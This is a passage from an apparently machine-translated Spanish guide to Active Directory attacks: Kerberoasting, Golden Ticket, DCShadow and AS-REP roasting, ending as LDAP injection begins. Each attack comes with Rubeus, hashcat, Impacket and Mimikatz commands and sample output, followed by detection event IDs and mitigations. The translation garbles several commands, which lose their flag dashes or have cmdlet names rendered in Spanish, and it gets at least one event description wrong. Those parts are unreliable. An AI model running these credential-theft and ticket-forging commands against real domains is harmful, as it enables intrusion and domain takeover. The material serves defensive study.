$buscar = NuevoObjeto System.DirectoryServices.DirectorySearcher
$buscar.SearchRoot = $dominio
$buscar.PageSize = 1000
$buscar.Filtro = $ldapFilter
$search.SearchScope = "Subárbol"
#Ejecutar búsqueda
$resultados = $buscar.FindAll()
#Mostrar valores de SPN de los objetos devueltos
$Resultados = foreach ($resultado en $resultados)
{
$resultado_entrada = $resultado.GetDirectoryEntry()
$resultado_entrada | Seleccionar objeto @{
Nombre = "Nombre de usuario"; Expresión = { $_.sAMAccountName }
}, @{
Nombre = "SPN"; Expresión = { $_.servicePrincipalName | Seleccionar objeto
Primero 1 }
}
}
$Resultados
Tenga en cuenta que los SPN se componen de dos partes:
• el • el nombre de host de y
clase de servicio .
La clase de servicio es el nombre del servicio, como "HTTP" o "ldap", y el nombre de host es el
nombre de host DNS o la dirección IP de la máquina donde se ejecuta el servicio. Por ejemplo,
un SPN para un servidor web podría ser "HTTP/
webserver1.example.com", donde "HTTP" es la clase de servicio y
"webserver1.example.com" es el nombre de host.
La posible salida de este filtro LDAP es la siguiente:
Nombre de usuario SPN
CuentaServicio1 http/servidorweb1
ServiceAccount2 cifs/appserver2
Técnica de ataque 2: Kerberoasting 19
Machine Translated by Google
Paso 2: Solicitud de billetes TGS
Un atacante puede apuntar a cuentas de servicio específicas al identificar y enumerar sus nombres
principales de servicio (SPN) y luego solicitar boletos del Servicio de concesión de boletos (TGS) para estas
cuentas de servicio. Se pueden utilizar herramientas como Rubeus para automatizar este proceso
extrayendo los hashes de contraseña de la memoria [26].
PD> .\Rubeus.exe kerberoast /simple /outfile:passwordhashes.txt
[*] Acción: Kerberoasting
[*] AVISO: Se devolverán hashes AES para cuentas habilitadas para AES.
[*] Use /ticket:X o /tgtdeleg para forzar RC4_HMAC para estas cuentas.
[*] Buscando el dominio actual para usuarios de Kerberoastable
[*] Total de usuarios de kerberoastable: 2
[*] Hash escrito en C:\Tools\hashes.txt
[*] Hashes tostados escritos en: C:\Tools\hashes.txt
PS> ObtenerContenido .\passwordhashes.txt
$krb5tgs$23$*CuentaServicio1$dominio.com$http/servidorweb1*$45FAD4676AECDDE4C1397BF
CED441F79$DEB. . .
# ... salida truncada ... #
Paso 3: descifrar la contraseña en línea
El siguiente paso en el ataque es obtener las contraseñas de texto sin formato de las cuentas de servicio, este
proceso se realiza mediante un ataque de fuerza bruta fuera de línea, lo que significa que el atacante no necesita
comunicarse con el directorio activo, lo que lo hace indetectable.
Para realizar esta tarea, el atacante puede utilizar diferentes herramientas como John the Ripper y
Hashcat, que están diseñados específicamente para descifrar contraseñas con diccionarios de contraseñas
comunes:
PS> .\hashcat.exe m 13100 o cracked.txt a 0 .\passwordhashes.txt
.\listadepalabras.txt
Técnica de ataque 2: Kerberoasting 20
Machine Translated by Google
El comando usa el ejecutable hashcat.exe y especifica los siguientes indicadores:
• m 13100: esta marca se usa para especificar el tipo de hash, en este caso Kerberos 5 TGS
(Servicio de Otorgamiento de Billetes)
• o cracked.txt: este indicador se usa para especificar el archivo de salida donde se
las contraseñas se guardarán
• a 0: Esta bandera se usa para especificar el modo de ataque, en este caso 0 significa modo de ataque
"Straight".
El comando también especifica las rutas de archivo de passwordhashes.txt y wordlist.txt. Una vez que se ejecuta el
comando, Hashcat intentará encontrar una coincidencia entre los hashes de contraseña en el archivo
passwordhashes.txt y las palabras en el archivo wordlist.txt.
Paso 4: Uso de nuevos privilegios para promover objetivos
Una vez que se ha descifrado la contraseña, el atacante puede usar las credenciales de la cuenta de servicio para
acceder a los recursos de la red y promover sus objetivos.
Por ejemplo, al tener las credenciales de la cuenta, el adversario puede usar la herramienta runas con el parámetro /
netonly para ejecutar PowerShell como el usuario "ServiceAccount1" .
Métodos de detección para el ataque Kerberoasting
Es posible identificar varios signos de Kerberoasting observando el registro de eventos de Windows en busca de
solicitudes inusuales para el servicio de concesión de tickets (TGS) [27], [28].
Id. de evento 4769 : se solicitó un vale de servicio de Kerberos.
• Campos de descripción clave: nombre de la cuenta, nombre del servicio, dirección del cliente
Id. de evento 4770 : se renovó un vale de servicio de Kerberos.
• Campos de descripción clave: nombre de cuenta, ID de usuario, nombre de servicio, ID de servicio
Técnica de ataque 2: Kerberoasting 21
Machine Translated by Google
Técnicas de mitigación para el ataque Kerberoasting
Para proteger las contraseñas de las cuentas de servicio de los ataques de Kerberoasting, se pueden tomar
varias medidas, como [29]:
Técnica de mitigación 1: rechazo de solicitudes de autenticación que no utilizan Kerberos
Tunelización segura de autenticación flexible (FAST)
Esto también se conoce como blindaje de Kerberos. Esta extensión de autenticación previa crea un canal
seguro entre el cliente y el controlador de dominio, con el objetivo de mejorar la protección de los tickets de
Kerberos frente a los intentos de descifrado de contraseñas fuera de línea. Si bien FAST puede erradicar
la amenaza que representa Kerberoasting, implementarlo de manera rápida y efectiva en una organización
puede resultar un desafío.
Técnica de mitigación 2: Eliminación del uso de protocolos inseguros en Kerberos
Aunque deshabilitar completamente RC4 es una tarea importante, es posible configurar cuentas de
servicio individuales para que no acepten el protocolo RC4. Al establecer el atributo
msDSSupportedEncryptionTypes en 0x18 (decimal 24), solo se habilitarán AES128 y AES256 . Este
cambio no solo mejora la seguridad, sino que también facilita la detección de actividades maliciosas, ya que
el uso de RC4 en una solicitud TGS es un indicador más sólido.
Técnica de mitigación 3: Adoptar prácticas sólidas de higiene de contraseñas para cuentas
de servicio
Las contraseñas de las cuentas de servicio deben generarse aleatoriamente, tener una longitud mínima
de 30 caracteres y cambiarse con frecuencia.
Técnica de ataque 2: Kerberoasting 22
Machine Translated by Google
Técnica de ataque 3:
Ataque del billete dorado
El ataque Golden Ticket consiste en falsificar un ticket Kerberos para obtener acceso no autorizado a un
sistema informático como usuario privilegiado. Para llevar a cabo el ataque, un atacante debe obtener el
NTHash de la cuenta krbtgt , la cuenta responsable de cifrar y firmar todos los tickets dentro de un dominio,
así como el Identificador de seguridad (SID) del dominio. Con esta información, el atacante puede crear un
ticket dorado fraudulento que imite un ticket legítimo emitido por el servidor de autenticación del dominio.
Este ticket dorado proporciona al atacante la capacidad de acceder a información y recursos confidenciales
en el sistema objetivo.
Herramientas y Técnicas para Realizar un Ataque de Billete Dorado
Los adversarios pueden usar varias herramientas de terceros, como Mimikatz e Impacket, para realizar un
ataque con Golden Ticket.
Herramienta 1: paquete de impacto
En este escenario, supondremos que al realizar un ataque Kerberoasting, un atacante descargó un
archivo de hashes y los descifró para obtener acceso de administrador al controlador de dominio. En
otras palabras, tenemos la contraseña de texto sin formato de un usuario administrador que puede acceder
al DC. Además, nuestro nombre de dominio será EJEMPLO.local para mayor eficiencia.
Un ataque típico de Golden Ticket con Impacket consta de dos partes principales.
Técnica de Ataque 3: Ataque del Boleto Dorado 23
Machine Translated by Google
Paso 1: Forjando un boleto dorado
Para crear un ticket dorado válido, se requiere cierta información, como el NTHash de la cuenta krbtgt del controlador de
dominio y el SID del dominio. Esta información se puede obtener utilizando el script secretsdump.py de Impacket, siempre
que el atacante tenga acceso de administrador al controlador de dominio. A continuación, encontrará la sintaxis adecuada para
volcar NTHash para la cuenta krbtgt [30].
Administrador de secretdump.py : "Contraseña"@<DC_IP_Address>
Suponga que NTHash es bf106a6860c6f7b3317c653a38aba33.
A continuación, el atacante necesita conocer el SID del dominio. Para ello, pueden aprovechar la herramienta
lookupsid.py de Impacket . Tenga en cuenta que aunque el atacante elige el controlador de dominio como objetivo, este
ataque funciona con cualquier controlador de dominio.
lookupsid.py EJEMPLO.local/Administrador:"Contraseña"@<DC_IP_Address>
Suponga que el SID del dominio es S5152120492512898678224041193079966.
Finalmente, el atacante utiliza la herramienta ticketer.py de Impacket para falsificar un ticket dorado para un usuario de
dominio. Una ventaja de ticketer.py es que el boleto falsificado se escribe en un archivo .ccache en lugar de .kirbi; en otras
palabras, el atacante no tiene que convertirlo.
ticketer.py nthash bf106a6860c6f7b3317c653a38aba33 dominiosid
"S5152120492512898678224041193079966" dominio EJEMPLO.local Alice
Tenga en cuenta que el comando anterior es un ejemplo de un atacante que falsifica un boleto dorado para un
administrador de dominio inexistente, Alice.
Paso 2: Usar un boleto dorado
Para configurar el ticket dorado para su uso, la variable de entorno KRB5CCNAME debe establecerse en la ruta del
archivo .ccache , que puede ser una ruta de archivo absoluta o relativa. La variable de entorno KRB5CCNAME
se utiliza para informar a las herramientas de Impacket que admiten tickets de Kerberos dónde encontrar el ticket. Esto le
permite al atacante usar el boleto dorado para acceder al sistema como un usuario privilegiado [30].
Luego, el adversario puede usar las herramientas de ejecución de comandos de Impacket, como psexec.py,
smbexec.py o wmiexec.py, para cargar y autenticarse con el ticket, lo que eventualmente le da al adversario una ejecución
de comando. Para que funcione la autenticación Kerberos, el adversario debe proporcionar la dirección IP del objetivo, la
dirección IP del controlador de dominio y el dominio.
nombre.
Técnica de Ataque 3: Ataque del Boleto Dorado 24
Machine Translated by Google
psexec.py $EXAMPLE.local/$Administrator@$TARGET_NAME targetip $TARGET_IP
dcip $DC_IP nopass k
Tenga en cuenta que mientras que la opción nopass le dice al script que omita la autenticación basada
en contraseña, la opción k especifica que el ticket de Kerberos debe tomarse del KRB5CCNAME
Variable ambiental. El propósito de este script es ejecutar comandos de forma remota en la computadora
de destino utilizando la autenticación Kerberos sin tener que ingresar una contraseña.
Herramienta 2: Mimikatz
Un ataque típico de Golden Ticket con Impacket consta de tres partes principales.
Paso 1: Comprometer el hash de contraseña para la cuenta krbtgt
Como fue el caso con el escenario de Impacket, para que un ataque Golden Ticket funcione, un
adversario debe tener acceso de administrador a un controlador de dominio. Por lo tanto, comenzaremos
con esta suposición.
Para exfiltrar el hash de la contraseña del usuario krbtgt , el atacante puede usar el
comando “lsadump::dcsync” .
PD> mimikatz.exe "lsadump::dcsync /usuario:DOMINIO\KRBTGT"
Nombre de usuario SAM : krbtgt
Nombre principal de usuario: krbtgt@DOMAIN.com
Último cambio de contraseña: 09/03/2020 14:51:03
ID de seguridad del objeto: S1521584055927567450511363507867502 #
Cartas credenciales:
Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159 # Hash NTLM
. . .
aes256_hmac (4096) :
ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
. . .
Tenga en cuenta que "lsadump::dcsync /user:DOMAIN\KRBTGT" es un argumento de línea de
comandos para Mimikatz que le indica que realice una operación "DCSync" utilizando la
cuenta de usuario "DOMAIN\KRBTGT", que es la cuenta predeterminada utilizada por el Servicio
de autenticación Kerberos en entornos Windows Active Directory [31].
Paso 2: falsificación de tickets de Kerberos
Al obtener acceso al hash de la contraseña KRBTGT, pueden usar Mimikatz para falsificar tickets de
Kerberos. Esto puede implicar la creación de un ticket de concesión de tickets (TGT) falso para
una cuenta de usuario inexistente.
Técnica de Ataque 3: Ataque del Boleto Dorado 25
Machine Translated by Google
Tenga en cuenta que las actualizaciones de seguridad de noviembre de 2021 para Kerberos han parcheado
este método de ataque. Como resultado, si los controladores de dominio instalaron la actualización, se debe
usar una cuenta de usuario real.
Para falsificar un TGT, el atacante debe proporcionar cierta información a la función Mimikatz
kerberos::golden : el nombre de dominio completo del dominio, el identificador de seguridad del dominio
(SID), el hash de la contraseña del usuario KRBTGT (usando AES256 , y alternativamente
AES128, NTLM o RC4), el nombre de usuario para suplantar, el RID de grupos para incluir en el ticket,
siendo el primero el grupo principal del usuario, y el indicador ptt para indicar si el ticket falsificado debe
ser inyectado en la sesión actual en lugar de guardarlo en un archivo:
PD> mimikatz.exe "kerberos::golden /dominio:dominio.com
/sid:S1521584055927567450511363507867
/aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /id:500 /
usuario:Administrador inexistente /grupos:Número de grupo1, Número de grupo2 /ptt"
Usuario : Administrador no existente
Dominio : dominio.com (DOMINIO)
S.I.D. : S1521584055927567450511363507867
Identificación de usuario : 500
Identificación de grupos: *513 2668
Clave de servicio: ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
aes256_hmac
> Boleto : ** Pase el boleto **
. . .
Ticket dorado para 'NonExistentUser@domain.com' enviado con éxito para
sesión actual
Tenga en cuenta que con el indicador /id, el adversario indicó la identificación de usuario para la que desea
crear el ticket. En este caso, el atacante pasa el valor 500 al indicador /id para crear una cuenta de
administrador . El nombre de la cuenta de usuario puede ser cualquier cosa, como se indica en el ejemplo.
Paso 3: Uso del ticket kerberos falsificado
El atacante puede utilizar el ticket falsificado para obtener acceso a los recursos integrados con
Kerberos. El TGT está firmado y encriptado con el hash de contraseña KRBTGT real, lo que lo convierte en
una prueba de identidad válida a los ojos de cualquier controlador de dominio. Luego, el controlador de
dominio emitirá boletos del servicio de otorgamiento de boletos (TGS) basados en el TGT.
A medida que el atacante obtiene más información sobre el entorno, puede usar los tickets falsificados
para acceder a aplicaciones, bases de datos u otros recursos que usan Active Directory para autenticación
y autorización. El atacante puede apuntar a grupos específicos al incluir su RID en el proceso de falsificación
de tickets. Por ejemplo, podrían descubrir el grupo "Administradores de MSSQL" con el RID
correspondiente durante una fase de descubrimiento, lo que podría brindarles acceso a valiosas bases de
datos [31].
Técnica de Ataque 3: Ataque del Boleto Dorado 26
Machine Translated by Google
Métodos de detección para el ataque del boleto dorado
Id. de evento 4769 : se solicitó un vale de servicio de Kerberos.
• Campos de descripción clave: nombre de la cuenta, nombre del servicio, dirección del cliente
Id. de evento 4624 : se inició sesión correctamente en una cuenta.
• Campos de descripción clave: Nombre de la cuenta, Dominio de la cuenta, ID de inicio de sesión
Id. de evento 4627: identifica la cuenta que solicitó el inicio de sesión.
• Campos de descripción clave: ID de seguridad, nombre de cuenta, dominio de cuenta, ID de inicio de sesión
Técnicas de mitigación para el ataque del boleto dorado
Para protegerse contra los ataques de Kerberoasting, se recomienda tomar medidas para limitar el acceso de los adversarios
y dificultarles la obtención del hash de la contraseña del usuario KRBTGT.
Esto se puede lograr a través de las siguientes acciones [31], [32]:
Técnica de mitigación 1: Restricción de privilegios administrativos a través de los límites
de seguridad
Las organizaciones no deben permitir que los usuarios posean privilegios administrativos a través de los límites de
seguridad. Por ejemplo, un atacante que obtenga acceso a una estación de trabajo no debería poder escalar sus privilegios
para apuntar al controlador de dominio.
Técnica de mitigación 2: Minimización de privilegios elevados
Las cuentas de servicio con altos privilegios, como los administradores de dominio, deben otorgarse solo cuando sea necesario.
Al limitar la cantidad de estas cuentas, las organizaciones pueden reducir la cantidad de objetivos para un atacante que
busca el hash KRBTGT.
Técnica de mitigación 3: Cambiar periódicamente la contraseña de la cuenta KRBTGT
Es importante cambiar la contraseña del usuario KRBTGT periódicamente e inmediatamente después de cualquier
cambio en el personal responsable de la administración de Active Directory.
La contraseña debe cambiarse dos veces, con un intervalo de 12 a 24 horas entre los dos cambios, para evitar interrupciones en
el servicio.
Técnica de Ataque 3: Ataque del Boleto Dorado 27
Machine Translated by Google
Técnica de ataque 4:
DCShadow Attack
Un ataque DC Shadow implica comprometer el entorno de Active Directory al introducir un controlador
de dominio (DC) no autorizado en la red y luego replicar los cambios de los controladores de
dominio legítimos al no autorizado. El ataque consta de seis pasos.
Un ataque DC Shadow es un tipo de ataque en un entorno de Active Directory en el que un atacante
introduce un controlador de dominio (DC) no autorizado en la red y replica los cambios de los
controladores de dominio legítimos. El atacante primero crea cambios en el entorno, como agregar
nuevos objetos o modificar los existentes, y luego espera a que los cambios se repliquen en los
controladores de dominio legítimos. Luego registran los nombres principales de servicio (SPN) para
el controlador de dominio no autorizado y lo registran en el espacio de nombres de
configuración, lo que le permite autenticarse y comunicarse con otros controladores de
dominio. El atacante desencadena la replicación de los cambios que realizó en el controlador de
dominio no autorizado, que los replica, lo que permite que los cambios persistan en el entorno.
Finalmente, el atacante elimina los SPN y el controlador de dominio no autorizado, cubre sus huellas
y deja el entorno en un estado comprometido. Este tipo de ataque permite que el atacante persista
y controle la red realizando cambios que se replican en otros controladores de dominio.
Técnica de ataque 4: DCShadow Attack 28
Machine Translated by Google
Herramientas y técnicas para realizar un ataque DCShadow
Los adversarios suelen utilizar Mimikatz como herramienta para realizar la técnica de ataque DCShadow.
Herramienta 1: Mimikatz
Antes de continuar, debemos suponer que el atacante ya ha comprometido las credenciales de una
cuenta de Active Directory con permisos administrativos; supongamos que el usuario se llama Bob. La
razón detrás de esta suposición es que una cuenta administrativa le permite al adversario
realizar cambios en el entorno, como agregar un controlador de dominio falso y replicar los cambios
de los controladores de dominio legítimos.
Sin acceso administrativo, el atacante no sería capaz de llevar a cabo el ataque.
Un ataque DCShadow típico consta de dos pasos.
Paso 1: Elevar los privilegios del SISTEMA y realizar cambios en el objeto
replicado
El primer paso consiste en iniciar el servicio mimidrv , que proporciona los privilegios necesarios para
desempeñar el papel de un controlador de dominio falso [33]. Estos comandos iniciales ("!+"
y "!ProcessToken") registran e inician un servicio llamado "mimidrv" y elevan los privilegios a SYSTEM.
PD> .\mimikatz.exe "!+ !ProcessToken"
A continuación, el adversario ejecuta los siguientes comandos [33], [34].
mimikatz # lsadump::dcshadow
/objeto:"CN=Alice,OU=Empleados,DC=sub,DC=dominio,DC=com" /attribute:SidHistory
/valor:S5152120492512898678224041193079966
. . .
**
** Servidor de inicio
> BindString[0]: ncacn_ip_tcp:<LocationOfFakeServer>[ThePortItListensTo]
> Enlace RPC registrado
> ¡El servidor RPC está esperando!
== Presiona Control+C para detener ==
Este comando se usa para especificar el servidor falso para un ataque DCShadow.
Técnica de ataque 4: DCShadow Attack 29
Machine Translated by Google
El modificador "/objeto" se utiliza para especificar el objeto de usuario de destino, en este caso, el usuario "Alice".
El modificador "/attribute" se utiliza para especificar el atributo que debe modificarse en el objeto de usuario de
destino, en este caso "SidHistory". Finalmente, el modificador "/value" se usa para especificar el nuevo valor
para el atributo especificado, en este caso
"S5152120492512898678224041193079966".
En el contexto de un ataque DCShadow, este comando se usa para especificar el servidor falso y apuntar al
objeto de usuario para modificar su atributo SidHistory con el nuevo valor especificado. El atributo modificado
se puede usar para otorgar al atacante acceso no autorizado al sistema de destino y a la información
confidencial.
Paso 2: enviar los cambios a un controlador de dominio real
En el segundo paso, el adversario tiene que volver a lanzar Mimikatz como la cuenta "Bob", que comprometió en
primer lugar. El adversario ejecuta el siguiente comando:
mimikatz # lsadump::dcshadow /push
Se espera que el comando lsadump::dcshadow /push realice un ataque DCShadow al registrar un controlador
de dominio falso (shadowDC) y enviarle datos de replicación. El objetivo de este ataque es modificar el contenido
de la base de datos de Active Directory utilizando el controlador de dominio no autorizado. Una vez que se
han confirmado los datos de replicación, el controlador de dominio falso se anula del registro con fines de limpieza.
Una vez que todo está hecho, el atacante cierra la sesión de la cuenta comprometida Bob y vuelve a iniciar
sesión para obtener el token de acceso actualizado con el historial de SID modificado.
Métodos de detección para el ataque ShadowDC
La única forma definitiva de identificar un ataque DCShadow es a través de la supervisión de la red de las
solicitudes de llamada a procedimiento remoto (RPC) DRSUAPI para la operación DRSUAPI_REPLICA_ADD
que se originan en sistemas que no se sabe que son controladores de dominio. Otro método para detectar
DCShadow es mediante el análisis de los registros de eventos de Windows, pero este enfoque solo
proporciona señales del ataque y no los cambios exactos realizados por el atacante.
Para imitar un controlador de dominio, DCShadow debe realizar cambios en Active Directory, como agregar
un nuevo objeto NTDDSA y un servicePrincipalName de catálogo global (GC/<host>) a
un objeto de equipo que no sea un controlador de dominio conocido. Una vez que se complete el ataque, se
eliminarán ambos elementos.
Al examinar los eventos 5136 y 5141 en la subcategoría Audit Directory Service Changes del registro de
eventos de Windows ([35], [36]), puede buscar evidencia de la creación y eliminación de objetos de servidor
dentro de los sitios.
Técnica de ataque 4: DCShadow Attack 30
Machine Translated by Google
Id. de evento 5136: la plataforma de filtrado de Windows ha permitido una conexión.
• Campos de descripción clave: ID de seguridad, nombre de cuenta, dominio de cuenta, ID de inicio de sesión
Id. de evento 5141: se eliminó un objeto de servicio de directorio.
• Campos de descripción clave: ID de seguridad, nombre de cuenta, dominio de cuenta, ID de inicio de sesión
Técnicas de mitigación para el ataque DCShadow
El ataque DCShadow es un tipo de amenaza persistente avanzada (APT) que aprovecha las funciones y los privilegios
de Active Directory (AD) para modificar datos de manera maliciosa. Como no es posible eliminar por completo el riesgo
de este ataque, es importante adoptar un enfoque de seguridad de varias capas para mitigarlo. Aquí hay algunas
sugerencias que pueden ayudarlo a reducir el riesgo de un ataque DCShadow exitoso:
Técnica de mitigación 1: Implementación de políticas de firewall
Utilice cortafuegos basados en host para limitar el movimiento lateral. Asegúrese de que los protocolos de
administración remota, como RDP, solo sean accesibles desde un pequeño conjunto de sistemas aprobados y
monitoreados.
Técnica de mitigación 2: limitar los privilegios de los usuarios
Es esencial limitar la cantidad de usuarios con privilegios administrativos a través de los límites de seguridad. Esto
ayuda a minimizar la medida en que un atacante puede escalar sus privilegios.
Técnica de mitigación 3: controlar el acceso a los objetos informáticos
Restrinja la cantidad de usuarios con permiso para agregar objetos de computadora a Active Directory. Esto
ayuda a evitar cambios no autorizados en la infraestructura de AD.
Técnica de mitigación 4: Reducir los permisos administrativos delegados
Controle adecuadamente los grupos privilegiados integrados y los permisos administrativos delegados para reducir el
riesgo de abuso.
Técnica de mitigación 5: Mantener una buena higiene de Active Directory
La eliminación periódica de sitios y objetos informáticos no utilizados ayuda a mantener una buena higiene de Active
Directory y reduce la superficie de ataque.
Al seguir estas estrategias de mitigación, las organizaciones pueden protegerse mejor contra los ataques DCShadow y
otros tipos de amenazas persistentes avanzadas.
Técnica de ataque 4: DCShadow Attack 31
Machine Translated by Google
Técnica de ataque 5:
ASREP Tueste
La técnica de asado ASREP permite a los atacantes adquirir hashes de contraseñas de cuentas
de usuario que han desactivado la autenticación previa de Kerberos. Este método implica la
transmisión de un mensaje de solicitud de servidor de autenticación (ASREQ) al controlador de dominio
(DC). Si la autenticación previa está deshabilitada, el DC devolverá un mensaje ASREP que contiene
datos cifrados, incluido un segmento cifrado con el hash de la contraseña del usuario. Posteriormente, el
atacante puede utilizar esta información para intentar descifrar la contraseña del usuario fuera de línea.
En circunstancias normales, con la autenticación previa activada, el usuario inicia el procedimiento
de autenticación Kerberos enviando un mensaje ASREQ al DC. Este mensaje se cifra con una
marca de tiempo, que se cifra aún más con el hash de la contraseña del usuario. Si el DC descifra
con éxito la marca de tiempo utilizando su registro almacenado del hash de la contraseña del usuario,
responderá con un mensaje ASREP que incluye un Ticket de concesión de tickets (TGT), emitido por el
Centro de distribución de claves (KDC). El usuario entonces emplea este TGT para futuras solicitudes de
acceso.
Técnica de Ataque 5: Tueste ASREP 32
Machine Translated by Google
Herramientas y técnicas para realizar un ataque de tueste ASREP
Los adversarios pueden usar varias herramientas de terceros para realizar un ataque de tostado ASREP, como Rubeus
y Empire, Kerbrute e Impacket.
Herramienta: Rubeus
Para encontrar todas las cuentas que no requieren autenticación previa y extraer sus hashes ASREP para el craqueo
fuera de línea, un adversario ejecuta el siguiente comando.
Rubeus.exe como reproche
Para hacer que el ataque avance unos pasos, el atacante puede aprovechar algunos parámetros para extraer los datos
en un formato que, por ejemplo, Hashcat puede descifrar fuera de línea:
Rubeus.exe asreproast /format:hashcat /outfile:C:\Temp\hashes.txt
Tenga en cuenta que las credenciales hash de salida se escriben en el archivo llamado hashes.txt en el directorio
Temp. A continuación, el adversario aprovecha el Hashcat, especificando el código de modo hash para hashes AS
REP (18200), un archivo hash y un diccionario para realizar la adivinación de contraseñas por fuerza bruta.
hashcat64.exe m 18200 c:\Temp\hashes.txt diccionario.dict
Para obtener una mejor comprensión del ataque ASREP Roasting y cómo se realiza mediante el uso de otras
herramientas, puede visitar aquí [37].
Métodos de detección para el ataque de tueste ASREP
La detección de ataques ASREP Roasting es crucial para mitigar el riesgo de robo de contraseña. Una forma de
detectar tales ataques es monitorear los cambios en la configuración que controla si la autenticación previa de Kerberos
está habilitada.
Id. de evento 4738 : se cambió una cuenta de usuario.
• Campos de descripción clave: ID de seguridad, nombre de cuenta, dominio de cuenta, ID de inicio de sesión,
ID de seguridad, nombre de cuenta
Por ejemplo, en el curso de un ataque de este tipo, se genera el ID de evento 4738 . Este evento significa una solicitud de
ticket del servicio de autenticación Kerberos y abarca parámetros como el tipo de cifrado del ticket (0x17), las opciones del
ticket (0x40800010) y el nombre del servicio (krbtgt). La presencia de estos parámetros en los registros de eventos
puede indicar un ataque de asado ASREP en curso, ya que este evento se produce cuando el atacante manipula los
objetos del dominio [38].
Técnica de Ataque 5: Tueste ASREP 33
Machine Translated by Google
Figura 1. El evento ID 4738 [38].
Id. de evento 5136 : se modificó un objeto de servicio de directorio.
• Campos de descripción clave: ID de seguridad, nombre de cuenta, dominio de cuenta, ID de inicio de sesión, DN,
GUID, clase, nombre para mostrar LDAP
Otra opción es monitorear el ID de evento 5136, que proporciona información sobre los cambios realizados en las
cuentas de usuario dentro de un entorno de Windows. Al analizar los registros de este evento, es posible identificar
cualquier cuenta de usuario a la que se le haya cambiado la configuración de autenticación previa
de Kerberos.
Técnica de Ataque 5: Tueste ASREP 34
Machine Translated by Google
Técnicas de Mitigación del Ataque ASREP
Hay un par de técnicas que puede realizar para mitigar un ataque ASREP.
Técnica de mitigación 1: Localización de todas las cuentas de usuario
La forma más eficaz de evitar ataques de tueste ASREP es ubicar todas las cuentas de usuario que
están configuradas sin requerir la autenticación previa de Kerberos y habilitar esta configuración.
Esto se puede hacer usando el siguiente script [39]:
GetADUser Filter * Properties DoesNotRequirePreAuth | DondeObjeto
{$_.DoesNotRequirePreAuth eq $True and $_.Enabled eq $True} | Seleccionar objeto
'SamAccountName','DoesNotRequirePreAuth' | OrdenarObjeto 'SamAccountName'
El script usa el cmdlet GetADUser con un filtro para encontrar todas las cuentas de usuario y especifica la
propiedad 'DoesNotRequirePreAuth' en el parámetro 'Properties' para recuperar la información
de autenticación previa para cada cuenta.
La salida del cmdlet GetADUser luego se canaliza al cmdlet WhereObject , que filtra los resultados para
incluir solo cuentas donde 'DoesNotRequirePreAuth' es igual a $True y 'Enabled' es igual a $True. Los
resultados filtrados luego se pasan al cmdlet SelectObject , que selecciona las propiedades 'SamAccountName'
y 'DoesNotRequirePreAuth' para cada cuenta. Finalmente, los resultados seleccionados se pasan al
cmdlet SortObject , que ordena los resultados por la propiedad 'SamAccountName' .
Al habilitar la autenticación previa de Kerberos para estas cuentas de usuario, se garantiza que el controlador
de dominio pueda descifrar la marca de tiempo cifrada con el hash de la contraseña del usuario. Esto hace
que sea mucho más difícil para un atacante obtener acceso al hash de la contraseña del usuario y llevar a
cabo un ataque de craqueo fuera de línea.
Técnica de mitigación 2: Implementación de una política de contraseña segura
Para protegerse contra los ataques de tostado de ASREP, es recomendable implementar políticas de
contraseñas seguras, especialmente para cuentas privilegiadas, que exigen el uso de contraseñas largas y
complicadas. Esto hace que sea un desafío para un atacante descifrar las contraseñas, incluso si se las roban
con éxito. La implementación de políticas de contraseñas detalladas es un primer paso eficaz para
garantizar la seguridad de las contraseñas.
Técnica de Ataque 5: Tueste ASREP 35
Machine Translated by Google
Técnica de mitigación 3: averiguar los privilegios de Active Directory
Es importante identificar quién tiene la autoridad para cambiar la configuración de autenticación previa,
ya que podría deshabilitarla temporalmente para robar el hash ASREP y luego volver a habilitarla.
La siguiente consulta mostrará todas las personas con derechos de acceso a las cuentas
sin autenticación previa [40]:
(GetACL "AD:\$((GetADUser Filter 'useraccountcontrol band
4194304').nombre distinguido)").acceso
El código recupera la lista de control de acceso (ACL) del descriptor de seguridad asociado con un objeto
de usuario específico en Active Directory (AD).
Primero filtra todas las cuentas de usuario en AD donde el valor "useraccountcontrol" tiene el 4194304
conjunto de bits decimales (que corresponde al indicador UF_DONT_REQUIRE_PREAUTH en
el atributo userAccountControl ) y recupera su nombre distinguido. Luego recupera la ACL del descriptor
de seguridad de la primera cuenta de usuario en el conjunto de resultados usando el nombre
distinguido y lo almacena en una variable. La última línea de código recupera la propiedad de acceso
de la ACL y la muestra, lo que representa los derechos de acceso que se otorgan o deniegan a los
principales de seguridad especificados en la ACL para el objeto de usuario de destino.
Técnica de Ataque 5: Tueste ASREP 36
Machine Translated by Google
Técnica de ataque 6:
Ataque de inyección LDAP
LDAP, una abreviatura de Protocolo ligero de control de acceso a directorios, es un protocolo de aplicación de
código abierto que se utiliza para la autenticación de servicios de directorio. En otras palabras, LDAP se
comporta como una plataforma cruzada que mantiene un lenguaje de comunicación para aplicaciones que se
comunican con otros servicios de directorio, que almacenan información sobre objetos y comparten esta
información con otras entidades en la red. Una cosa a tener en cuenta es que LDAP y Active Directory no son lo
mismo; de hecho, LDAP es el lenguaje que entiende Microsoft Active Directory (AD). Por lo tanto, si alguna vez
necesita acceder o autenticarse en los datos almacenados en AD, use LDAP para comunicarse con el servidor
de destino.
Una consulta LDAP, por otro lado, es el comando que solicita a un servicio de directorio en particular la
información que solicitó.
De forma predeterminada, usted, como cuenta válida sin privilegios en AD, puede utilizar consultas
LDAP para obtener información crítica. Por ejemplo, si desea enumerar todos los usuarios cContraseña
on "
nunca caduca la opción ” habilitado, luego ejecuta la siguiente consulta LDAP:
(categoría de objeto = usuario) (control de cuenta de usuario: 1.2.840.113556.1.4.803: = 65536)
Técnica de ataque 6: Ataque de inyección LDAP 37
Machine Translated by Google
La inyección LDAP es un tipo de vulnerabilidad que permite a un atacante inyectar código malicioso en una
consulta LDAP. Esto puede dar como resultado el acceso no autorizado a información confidencial almacenada
en el directorio LDAP o la manipulación de los datos almacenados en el directorio. Los ataques de inyección
de LDAP a menudo ocurren debido a la falta de validación y saneamiento de entrada adecuados en el
lado del cliente, donde los valores controlados por el usuario se agregan directamente al filtro de búsqueda de
LDAP. Los atacantes pueden explotar esta vulnerabilidad inyectando caracteres especiales en la consulta,
lo que cambia su significado previsto y permite al atacante eludir los controles de autenticación o
recuperar información confidencial.
Técnicas para realizar un ataque de inyección LDAP
